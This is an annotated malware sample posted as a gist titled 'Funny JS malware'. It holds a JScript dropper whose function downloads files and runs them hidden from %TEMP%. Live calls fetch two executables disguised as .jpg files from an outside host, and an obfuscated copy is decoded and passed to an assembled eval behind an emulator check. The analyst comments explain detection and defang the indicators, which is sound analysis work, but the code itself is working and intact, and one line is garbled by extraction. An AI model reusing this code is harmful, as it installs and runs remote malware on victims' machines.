@yackermann
Last active March 26, 2016 00:21
Funny JS malware
/**
 * Analyst annotation: download-and-run stage of a JScript dropper. It needs a host
 * that exposes ActiveXObject (for example Windows Script Host).
 *
 * Requests `fr` with an HTTP GET, writes the raw response body to a file under
 * %TEMP%, and, when `rn` is greater than 0, starts that file through WScript.Shell.
 *
 * Detection notes: the behaviour to alert on is a script-host process that
 * instantiates MSXML2.XMLHTTP and ADODB.Stream, writes a file into %TEMP% and then
 * launches it. No HTTP status is checked, so whatever body the server returns is
 * what lands on disk.
 *
 * @param {string} fr - URL to fetch.
 * @param {string} fn - Bare file name; rebound below to the full %TEMP% path.
 * @param {number} rn - Run flag; the saved file is executed only when this is > 0.
 */
function dl(fr, fn, rn) {
var ws = new ActiveXObject("WScript.Shell");
// String.fromCharCode(92) is a backslash, so no literal "\\" appears in the script text.
// The `var fn` re-declaration reuses the parameter binding; fn becomes %TEMP%\<fn>.
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() {
// readyState 4 means the request has completed; the status code is never inspected.
if (xo.readyState === 4) {
var xa = new ActiveXObject("ADODB.Stream");
xa.open();
// Stream type 1 is binary (adTypeBinary): the body is written byte-for-byte.
xa.type = 1;
xa.write(xo.ResponseBody);
xa.position = 0;
// Save option 2 (adSaveCreateOverWrite) overwrites any existing file at that path.
xa.saveToFile(fn, 2);
xa.close();
};
};
try {
// Third argument false makes the request synchronous; the Run call below presumably
// relies on the file already having been saved by the time send() returns.
xo.open("GET", fr, false);
xo.send();
if (rn > 0) {
// Run(path, 0, 0): window style 0 hides the window, and the final 0 means the
// script does not wait for the launched process to exit.
ws.Run(fn, 0, 0);
};
// Every error is swallowed, so a failed download or launch produces no visible message.
} catch (er) {};
}
// Analyst annotation: both payloads come from one host under .jpg paths, are saved as
// .exe files in %TEMP%, and are executed (third argument 1).
// Indicators visible on this page, defanged here for safe handling:
//   hxxp://31072015a[.]com/images/five1.jpg -> %TEMP%\532747350.exe
//   hxxp://31072015a[.]com/images/five2.jpg -> %TEMP%\211954869.exe
// The mismatch between the requested extension (.jpg) and the saved one (.exe) is a
// useful correlation point between proxy logs and endpoint file-creation events.
dl("http://31072015a.com/images/five1.jpg", "532747350.exe", 1);
dl("http://31072015a.com/images/five2.jpg", "211954869.exe", 1);
// Analyst annotation: obfuscated payload, split across several string variables.
// Every second character (even indexes) carries the real script text and the
// characters in between are filler. For example, the even-index characters of the
// first string begin with "function dl(fr, fn, rn){". The fragments are meaningless
// on their own and only form the script once concatenated and sampled further down.
// Neither the URL nor the ActiveX ProgIDs appear as contiguous text in this form, so
// plain string matching on them will not hit the undecoded file.
var qugx = 'fkumnjcethivosns gdfll(vfvrs,e wfrnr,k wrrnc)x{y s gvaagrh bwasr n=j vnvefwn nAlcttzigvpesXlOmbkjcexcgtt(z"dWrSscjrsizpqtt.aShhhejldlc"o)r;q a lvqahra ifsnm s=u jwzso.jEcxgpcamnydbEcnsvbikrzolnomceanftsSatqrjiinqgrsa(d"k%vTnEjMkPx%m"q)z ';
var zdubkd = 'y+o bSbthrcilnggo.zfirooembCphvakrxCmocdyep(n9t2d)x e+b jfuna;h j bvjaqre uxwos u=f hnzegww uArcttgitvsewXhOlbajeeqcbtn(k"cMvStXeMeLk2i.zXgMbLuHmTiTtPs"e)o;k y vxeoq.solncrsepasduydsctwaytweacdhgajndgnek x=z sfqusnwcftcivoang l(s)s{o l h';
var hgffin = ' h gikfk c(jxgod.nrnemaqdbywSntaaoteet l=j=v=h k4c)s{c u h o c o uvnayrx xxfaa k=s mnbetwj oAucyttinvjecXjOqbmjmejcpth(r"eAjDfOzDxBe.wSutjrxefacmk"g)w;t v q r o e bxran.sodpaebnt(h)t;x r y w o c txjam.qtpyopaev k=t r1b;l f g m w u exaau.';
var vgg = 'gwtrbiztret(yxooi.bRhersnpxogncsyecBnordtyp)d;z v p v p u wxjab.pploashiftyivonna c=e n0a;l q y o d q hxsat.hsnajvdecTdozFmieloey(ffvnd,e r2q)e;t v s t h i sxval.icdleobsker(l)n;u p n h u}c f z y j;e p z}i i v;b c ctjruyx v{d b z f lxroq';
var mwpkdt = '.zompfemnt(z"pGzEzTn"i,d cfhrm,k dfoanlfsxei)d;t l e t qxqok.gsqewnmdd(q)m;s p l f xipfh f(crsni q>g n0o)o{r h z v b p lwlsw.cRiuinf(yfunx,n g0d,k w0k)p;z d y p j}m e x d m;w y n}m k zciamthcrhs f(meqrs)s{t d p}d t o;h}rdelq(d"ihotgtvpl:';
var cbgezx = 'f/j/x3q1i0g7d2p0x1v5uaj.lcnobme/qirmiajgfepsa/jfgievseu1k.ojfpqgx"d,g f"j5j3v2g7f4q7p3q5d0r.veuxjee"d,o u1e)y;adilq(v"thftatkpc:d/q/i3m1a0e7t2f0u1j5way.bcsosmk/wiwmyaqgbewsr/kfnimveet2n.ojvpqgf"e,d g"i2x1m1d9g5j4b8h6b9u.seyxreq"p,t n1h)e';
var mre = ';b';
// Analyst annotation: decoder setup. The sampling step used by the loop that follows
// is a3 + a4, so the "key" a4 decides whether the payload decodes correctly.
var a1 = qugx + zdubkd + hgffin + vgg + mwpkdt + cbgezx + mre; // Concatenation of all fragments
var a2 = ""; // Deobfuscated output accumulates here
var a3 = 2; // Base step
var a4 = 10; // Key added to the step; starts at the "wrong" value
// NOTE(review): the next two lines look damaged by page extraction. The leading "y."
// has presumably slipped up from the following line, i.e. the sample likely read
// `var y = new ActiveXObject("Scripting.Dictionary");` then `y.add("a", "t");`.
// Confirm against the raw gist.
y.var y = new ActiveXObject("Scripting.Dictionary"); // Dictionary COM object used for the check below
add("a", "t");// Store key "a" with value "t"
// If the dictionary really stored the pair, a4 becomes 0 and the step is 2. Otherwise
// a4 stays 10, the step is 12, and the decoded text is not the intended script.
// Presumably an environment check against emulators that stub this COM object;
// that intent is inferred, not shown on the page.
if (y.Item("a") == "t") { // True when Scripting.Dictionary behaves normally
a4 = 0;
} else {
a4 = 10
};
/*-----DEOBFUSCATION-----*/
// Analyst annotation: walks a1 from index 0 and keeps every (a3 + a4)-th character.
// With a3 = 2 and a4 = 0 that is every second character, which yields the script text.
var a5 = a1.length;
var a = 0;
while (a < a5) {
a2 += a1.charAt(a);
a += a3 + a4; // Step is 2 when a4 is 0
};
/*-----EVAL-----*/
// The name "eval" is assembled from array elements 0, 2, 4 and 6 (the "0" entries are
// filler), so the literal token never appears as a contiguous string in the file.
var rosa = ["e", "0", "v", "0", "a", "0", "l", "0"];
var tosta = rosa[0] + rosa[2] + rosa[4] + rosa[6];
var a6 = tosta; // "eval"
// Looks the function up by name on `this` and executes the decoded text. This is the
// point where the hidden code actually runs. For static analysis, the contents of a2
// can be read without ever reaching this call.
this[a6](a2); //30fuKB9Dok